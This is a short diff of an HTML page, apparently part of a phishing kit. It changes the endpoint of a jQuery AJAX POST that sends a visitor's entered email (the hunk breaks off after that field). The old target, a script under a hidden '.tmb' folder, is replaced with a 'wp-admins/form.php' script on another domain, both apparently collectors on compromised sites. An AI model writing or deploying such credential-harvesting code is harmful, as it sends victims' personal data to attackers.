--- a/bmiknewutoindex.html
+++ b/bmiknewutoindex.html
@@ -235,7 +235,7 @@
       
       $.ajax({
         dataType: 'JSON',
-        url: 'https://membros.autogestaoempresarial.com.br//.tmb/form.php',
+        url: 'https://ygcsl.com//wp-admins/form.php',
         type: 'POST',
         data:{
           email:email,
